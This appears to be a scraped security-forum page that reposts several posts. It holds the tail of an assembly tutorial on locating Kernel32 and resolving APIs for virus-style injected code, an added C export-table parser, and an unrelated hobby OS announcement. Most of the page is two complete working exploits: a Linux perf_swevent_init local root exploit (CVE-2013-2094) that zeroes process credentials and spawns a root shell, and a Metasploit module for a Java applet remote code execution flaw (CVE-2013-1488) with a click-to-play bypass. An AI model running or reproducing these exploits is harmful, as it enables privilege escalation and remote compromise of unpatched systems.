    mov ebx, [FS : 0x30]              ; get a pointer to the PEB
    mov ebx, [ebx + 0x0C]             ; get PEB->Ldr
    mov ebx, [ebx + 0x14]             ; get PEB->Ldr.InMemoryOrderModuleList.Flink (1st entry)
    mov ebx, [ebx]                    ; 2nd Entry
    mov ebx, [ebx]                    ; 3rd Entry
    mov ebx, [ebx + 0x10]             ; Get Kernel32 Base
    mov [ebp+dwKernelBase] , ebx

    add ebx, [ebx+0x3C]               ; Start of PE header
    mov ebx, [ebx+0x78]               ; RVA of export dir
    add ebx, [ebp+dwKernelBase]       ; VA of export dir
    mov [ebp+dwExportDirectory] , ebx

    lea edx,[ebp+api_GetProcAddress]
    mov ecx,[ebp+len_GetProcAddress]
    call GetFunctionAddress
    mov [ebp+AGetProcAddressA] , eax

    lea edx,[ebp+api_LoadLibrary]
    push edx
    push dword [ebp+dwKernelBase]
    call eax
    mov [ebp+ALoadLibraryA] , eax

    lea edx , [ebp+szUser32]
    push edx
    call eax

    lea edx , [ebp+api_MessageBoxA]
    push edx
    push eax
    mov ebx,[ebp+AGetProcAddressA]
    call ebx
    mov [ebp+AMessageBoxAA] , eax

    push 0
    lea edx,[ebp+szTitle]
    push edx
    lea edx,[ebp+szMsg]
    push edx
    push 0
    call eax

    popad
    push 0xBBBBBBBB                   ; OEP
    retn

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; <<<<< GetFunctionAddress >>>>>>                                                 ;
; Extracts Function Address From Export Directory and returns it in eax           ;
; Parameters : Function name in edx , Length in ecx                               ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetFunctionAddress:
    push ebx
    push esi
    push edi
    mov esi, [ebp+dwExportDirectory]
    mov esi, [esi+0x20]               ; RVA of ENT
    add esi, [ebp+dwKernelBase]       ; VA of ENT
    xor ebx,ebx
    cld
looper:
    inc ebx
    lodsd
    add eax , [ebp+dwKernelBase]      ; eax now points to the string of a function
    push esi                          ; preserve it for the outer loop
    mov esi,eax
    mov edi,edx
    cld
    push ecx
    repe cmpsb
    pop ecx
    pop esi
    jne looper
    dec ebx
    mov eax,[ebp+dwExportDirectory]
    mov eax,[eax+0x24]                ; RVA of EOT
    add eax,[ebp+dwKernelBase]        ; VA of EOT
    movzx eax , word [ebx*2+eax]      ; eax now holds the ordinal of our function
    mov ebx,[ebp+dwExportDirectory]
    mov ebx,[ebx+0x1C]                ; RVA of EAT
    add ebx,[ebp+dwKernelBase]        ; VA of EAT
    mov ebx,[eax*4+ebx]
    add ebx,[ebp+dwKernelBase]
    mov eax,ebx
    pop edi
    pop esi
    pop ebx
    ret

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;            Data Shit            ;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
szTitle:            db "Yo !",0
szMsg:              db "GreeTz From SIGSEGV",0
szUser32            db "User32.dll",0
AGetProcAddressA:   dd 0
api_GetProcAddress: db "GetProcAddress"
len_GetProcAddress: dd $-api_GetProcAddress
ALoadLibraryA:      dd 0
api_LoadLibrary:    db "LoadLibraryA",0
AMessageBoxAA:      dd 0
api_MessageBoxA:    db "MessageBoxA",0
dwKernelBase:       dd 0
dwExportDirectory:  dd 0
[/code]

That's it, but I shall post the complete virus source when I get through my exams. Hope you enjoyed this quick tutorial, any feedback is appreciated.

Greets, SIGSEGV.

Sursa: [Quick tutorial] Finding Kernel32 Base and walking its export table. - rohitab.com - Forums
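
The same export walk (ENT index, EOT ordinal, EAT slot) redone in C as an added example; this is not part of SIGSEGV's post. It keeps the offsets the asm uses but adds what an analysis tool needs and the asm skips: bounds checks on every read, a whole-string name compare, and a check for forwarded exports. The image it parses is a constructed in-memory test image (not a real DLL); the `rd`, `wr32`, `pe_export_rva` and `fake_image` names are this example's own.

```c
#include <stdint.h>
#include <string.h>

/* Offsets the tutorial walks, for a PE32 image mapped so RVA == offset (little-endian host). */
#define E_LFANEW        0x3C  /* IMAGE_DOS_HEADER.e_lfanew */
#define EXPORT_DIR_RVA  0x78  /* from "PE\0\0": DataDirectory[0].VirtualAddress */
#define EXPORT_DIR_SIZE 0x7C  /* DataDirectory[0].Size */
#define EXP_NUM_NAMES   0x18  /* IMAGE_EXPORT_DIRECTORY.NumberOfNames */
#define EXP_AOF         0x1C  /* AddressOfFunctions    (EAT) */
#define EXP_AON         0x20  /* AddressOfNames        (ENT) */
#define EXP_AONO        0x24  /* AddressOfNameOrdinals (EOT) */
#define IMG_LEN         0x800
/* Bounds-checked read of n bytes at off; the asm above trusts every pointer it follows. */
static int rd(const uint8_t *img, size_t len, uint32_t off, void *out, size_t n) {
    if (off > len || len - off < n) return 0;
    memcpy(out, img + off, n); return 1;
}
static void wr32(uint8_t *img, uint32_t off, uint32_t v) { memcpy(img + off, &v, 4); }
/* Resolve an exported name to its RVA (ENT index -> EOT ordinal -> EAT slot). Returns 0 if the name
 * is absent, the image is malformed, or the export is a forwarder: a string inside the export directory. */
uint32_t pe_export_rva(const uint8_t *img, size_t len, const char *name) {
    uint32_t pe, sig, exp, expsz, nnames, aof, aon, aono, name_rva, func_rva, i;
    uint16_t ord; size_t nlen = strlen(name);
    if (!rd(img, len, E_LFANEW, &pe, 4) || !rd(img, len, pe, &sig, 4) || memcmp(&sig, "PE\0\0", 4)) return 0;
    if (!rd(img, len, pe + EXPORT_DIR_RVA, &exp, 4) || !exp || !rd(img, len, pe + EXPORT_DIR_SIZE, &expsz, 4) ||
        !rd(img, len, exp + EXP_NUM_NAMES, &nnames, 4) || !rd(img, len, exp + EXP_AOF, &aof, 4) ||
        !rd(img, len, exp + EXP_AON, &aon, 4) || !rd(img, len, exp + EXP_AONO, &aono, 4)) return 0;
    for (i = 0; i < nnames; i++) {
        if (!rd(img, len, aon + 4 * i, &name_rva, 4)) return 0;
        /* Whole-string match including the NUL; the asm's length-limited "repe cmpsb" would accept GetProcAddressForCaller for GetProcAddress. */
        if (name_rva >= len || len - name_rva <= nlen || memcmp(img + name_rva, name, nlen + 1)) continue;
        if (!rd(img, len, aono + 2 * i, &ord, 2) || !rd(img, len, aof + 4 * (uint32_t)ord, &func_rva, 4)) return 0;
        return (func_rva >= exp && func_rva < exp + expsz) ? 0 : func_rva;  /* 0: forwarder, not code */
    }
    return 0;
}

/* Constructed test image, not a real DLL: four named exports, "Sleep" being a forwarder. */
const uint8_t *fake_image(void) {
    static uint8_t img[IMG_LEN];
    static const char *names[4] = { "GetProcAddressForCaller", "GetProcAddress", "LoadLibraryA", "Sleep" };
    static const uint32_t funcs[4] = { 0x1100, 0x1000, 0x1200, 0x2A0 };  /* 0x2A0 lies inside the export dir */
    uint32_t i, str = 0x400;
    memset(img, 0, IMG_LEN);
    wr32(img, E_LFANEW, 0x40);               memcpy(img + 0x40, "PE\0\0", 4);
    wr32(img, 0x40 + EXPORT_DIR_RVA, 0x200); wr32(img, 0x40 + EXPORT_DIR_SIZE, 0x100);
    wr32(img, 0x200 + EXP_NUM_NAMES, 4);     wr32(img, 0x200 + EXP_AOF, 0x300);
    wr32(img, 0x200 + EXP_AON, 0x320);       wr32(img, 0x200 + EXP_AONO, 0x340);
    for (i = 0; i < 4; i++) {
        wr32(img, 0x300 + 4 * i, funcs[i]);  wr32(img, 0x320 + 4 * i, str);  /* EAT slot i, ENT entry i */
        img[0x340 + 2 * i] = (uint8_t)i;     /* EOT entry i -> ordinal i (low byte of the word) */
        strcpy((char *)img + str, names[i]); str += (uint32_t)strlen(names[i]) + 1;
    }
    return img;
}
```

Against a real module the same routine applies to a mapped image of a DLL you are analysing; a forwarder result (0 here) means the name must be resolved again in the module the forwarder string names.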
  23. [h=1]SidonX86 - A simple hobby OS[/h][h=3]by captmicro[/h]

I'm new to the forums (though I browse a lot) so I figured I'd post some content!

This is my hobby OS I've been working on for the past year or so, on and off when I have free time; it's still nothing near complete. It doesn't have paging at the moment, but I'm reading up about it and attempting to get it working on another OS before I implement it for this. It has memory allocation (blocks only), a text-mode screen library, a minimal C standard library (written by myself, and I have to say it's not the best), a serial port library, and a simple interrupt manager.

So far the only applications are a simple terminal, a half-working subleq OISC, and a hex editor (the only really decent app so far) that was ported from my xbox1 hex editor. I'm in the process of writing a transistor design and simulation tool for it, which is something I've really wanted to do for a long time, so expect that soon.

One thing that really needs to be done is a disk interface or some sort of in-memory file system so I can load applications without having to compile them into the OS. I've had a go at it once but never tested it (due to not having a file system to load a binary from), so it might just work (see kernel/binldr/elf.c for the code). I have implemented loading apps over a serial port in another OS, but it's probably the WORST idea I ever had.

As for the startup screen, don't mind it. This OS was intended to be my entry into low-level TCP/IP stack programming but I haven't gotten that far yet. Once I get a file system working I will probably start on the ethernet card driver and TCP/IP stack.

Feel free to do whatever you want with this OS, just please credit me (except the bootloader, I barely wrote any of it).

NOTE: you need mingw or some form of gcc, ld, and objcopy to use the build_kernel.bat script. NASM is included in the download.

Splash screen:

And the only decent app, the hex editor (it actually has quite a lot of features for a terminal hex editor!):

[h=4]Attached Files[/h]
likedev.zip 291.33K

Sursa: SidonX86 - A simple hobby OS - rohitab.com - Forums
  24. [h=1]Linux kernel perf_swevent_init - Local root Exploit[/h]

[code]
/*
 * CVE-2013-2094 exploit x86_64 Linux < 3.8.9
 * by sorbo (sorbo@darkircop.org) June 2013
 *
 * Based on sd's exploit.  Supports more targets.
 *
 */
#define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/perf_event.h>
#include <signal.h>
#include <assert.h>

#define BASE      0x380000000
#define BASE_JUMP 0x1780000000
#define SIZE      0x10000000
#define KSIZE     0x2000000

#define TMP(x) (0xdeadbeef + (x))

struct idt {
	uint16_t limit;
	uint64_t addr;
} __attribute__((packed));

static int _fd;

static int perf_open(uint64_t off)
{
	struct perf_event_attr attr;
	int rc;

//	printf("perf open %lx [%d]\n", off, (int) off);

	memset(&attr, 0, sizeof(attr));

	attr.type           = PERF_TYPE_SOFTWARE;
	attr.size           = sizeof(attr);
	attr.config         = off;
	attr.mmap           = 1;
	attr.comm           = 1;
	attr.exclude_kernel = 1;

	rc = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0);

	return rc;
}

void __sc_start(void);
void __sc_next(void);

void __sc(void)
{
	asm("__sc_start:\n"
	    "call __sc_next\n"
	    "iretq\n"
	    "__sc_next:\n");
}

void sc(void)
{
	int i, j;
	uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-8192));
	uint64_t kbase = ((uint64_t)current) >> 36;
	int uid = TMP(1);
	int gid = TMP(2);

	for (i = 0; i < 4000; i += 4) {
		uint64_t *p = (void *) &current[i];
		uint32_t *cred = (uint32_t*) p[0];

		if ((p[0] != p[1]) || ((p[0]>>36) != kbase))
			continue;

		for (j = 0; j < 20; j++) {
			if (cred[j] == uid && cred[j + 1] == gid) {
				for (i = 0; i < 8; i++) {
					cred[j + i] = 0;
					return;
				}
			}
		}
	}
}

static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)
{
	void *p;

	p = memmem(sc, 900, &needle, sizeof(needle));
	if (!p)
		errx(1, "can't find %x", needle);

	memcpy(p, &val, sizeof(val));
}

static void *map_mem(uint64_t addr)
{
	void *p;

	p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,
		 MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);

	if (p == MAP_FAILED)
		err(1, "mmap()");

	return p;
}

static int find_mem(void *mem, uint8_t c)
{
	int i;
	uint8_t *p = mem;

	for (i = 0; i < SIZE; i++) {
		if (p[i] == c)
			return i;
	}

	return -1;
}

static void dropshell()
{
	if (setuid(0) != 0)
		errx(1, "failed");

	printf("Launching shell\n");
	execl("/bin/sh", "sh", NULL);
	exit(0);
}

void morte(int x)
{
	printf("Got signal\n");
	close(_fd);
	dropshell();
}

static void trigger(int intr)
{
	switch (intr) {
	case 0:
		do {
			int z = 1;
			int a = 1;

			z--;
			a /= z;
		} while (0);
		break;

	case 4:
		asm("int $4");
		break;

	case 0x80:
		asm("int $0x80");
		break;

	default:
		errx(1, "unknown intr %d", intr);
	}

	sleep(3);
}

int main(int argc, char *argv[])
{
	uint32_t *p[2];
	int fd, i;
	uint64_t off;
	uint64_t addr = BASE;
	struct idt idt;
	uint8_t *kbase;
	int sz = 4;
	int intr = 4;

	printf("Searchin...\n");

	p[0] = map_mem(BASE);
	p[1] = map_mem(BASE_JUMP);

	memset(p[1], 0x69, SIZE);

	off = 0xFFFFFFFFL;

	fd = perf_open(off);
	close(fd);

	i = find_mem(p[0], 0xff);
	if (i == -1) {
		i = find_mem(p[1], 0x68);
		if (i == -1)
			errx(1, "Can't find overwrite");

		sz = 24;
		addr = BASE_JUMP;
		printf("detected CONFIG_JUMP_LABEL\n");
	}

	munmap(p[0], SIZE);
	munmap(p[1], SIZE);

	addr += i;
	addr -= off * sz;

	printf("perf_swevent_enabled is at 0x%lx\n", addr);

	asm("sidt %0" : "=m" (idt));

	printf("IDT at 0x%lx\n", idt.addr);

	off = addr - idt.addr;
	off -= 8;

	switch (off % sz) {
	case 0:
		intr = 0;
		break;

	case 8:
		intr = 0x80;
		break;

	case 16:
		intr = 4;
		break;

	default:
		errx(1, "remainder %d", off % sz);
	}

	printf("Using interrupt %d\n", intr);

	off -= 16 * intr;

	assert((off % sz) == 0);

	off /= sz;
	off = -off;

//	printf("Offset %lx\n", off);

	kbase = (uint8_t*) (idt.addr & 0xFF000000);

	printf("Shellcode at %p\n", kbase);

	if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
		 MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0) == MAP_FAILED)
		err(1, "mmap()");

	memset(kbase, 0x90, KSIZE);

	kbase += KSIZE - 1024;

	i = __sc_next - __sc_start;
	memcpy(kbase, __sc_start, i);
	kbase += i;

	memcpy(kbase, sc, 900);

	sc_replace(kbase, TMP(1), getuid());
	sc_replace(kbase, TMP(2), getgid());

	signal(SIGALRM, morte);
	alarm(2);

	printf("Triggering sploit\n");

	_fd = perf_open(off);

	trigger(intr);

	exit(0);
}
[/code]

Sursa: Linux kernel perf_swevent_init - Local root Exploit
  25. [h=1]Java Applet Driver Manager Privileged toString() Remote Code Execution[/h]

[code]
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java Applet Driver Manager Privileged toString() Remote Code Execution',
      'Description'    => %q{
          This module abuses the java.sql.DriverManager class where the toString() method
        is called over user supplied classes, from a doPrivileged block. The vulnerability
        affects Java version 7u17 and earlier. This exploit bypasses click-to-play on IE
        throw a specially crafted JNLP file. This bypass is applied mainly to IE, when
        Java Web Start can be launched automatically throw the ActiveX control. Otherwise
        the applet is launched without click-to-play bypass.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Forshaw', # Vulnerability discovery and Analysis
          'juan vazquez'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1488' ],
          [ 'OSVDB', '91472' ],
          [ 'BID', '58504' ],
          [ 'URL', 'http://www.contextis.com/research/blog/java-pwn2own/' ],
          [ 'URL', 'http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-076/' ]
        ],
      'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver.class")
    @driver_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "FakeDriver2.class")
    @driver2_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.lang.Object")
    @object_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1488", "META-INF", "services", "java.sql.Driver")
    @driver_services = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    @jnlp_name = rand_text_alpha(8)
    super
  end

  def jnlp_file
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"

    jnlp = %Q|
<?xml version="1.0" encoding="utf-8"?>
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
  <information>
    <title>Applet Test JNLP</title>
    <vendor>#{rand_text_alpha(8)}</vendor>
    <description>#{rand_text_alpha(8)}</description>
    <offline-allowed/>
  </information>
  <resources>
    <j2se version="1.7+" href="http://java.sun.com/products/autodl/j2se" />
    <jar href="#{rand_text_alpha(8)}.jar" main="true" />
  </resources>
  <applet-desc name="#{rand_text_alpha(8)}" main-class="#{@exploit_class_name}" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"></param>
  </applet-desc>
  <update check="background"/>
</jnlp>
    |
    return jnlp
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jnlp$/i
      send_response(cli, jnlp_file, { 'Content-Type' => "application/x-java-jnlp-file" })
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("FakeDriver.class", @driver_class)
      jar.add_file("FakeDriver2.class", @driver2_class)
      jar.add_file("META-INF/services/java.lang.Object", @object_services)
      jar.add_file("META-INF/services/java.sql.Driver", @driver_services)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    jnlp_uri = "#{get_uri}/#{@jnlp_name}.jnlp"
    # When the browser is IE, the ActvX is used in order to load the malicious JNLP, allowing click2play bypass
    # Else an <applet> tag is used to load the malicious applet, this time there isn't click2play bypass
    html = %Q|
<html>
<body>
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
  <param name="app" value="#{jnlp_uri}">
  <param name="back" value="true">
  <applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</object>
</body>
</html>
    |
    return html
  end

end
[/code]

Sursa: Java Applet Driver Manager Privileged toString() Remote Code Execution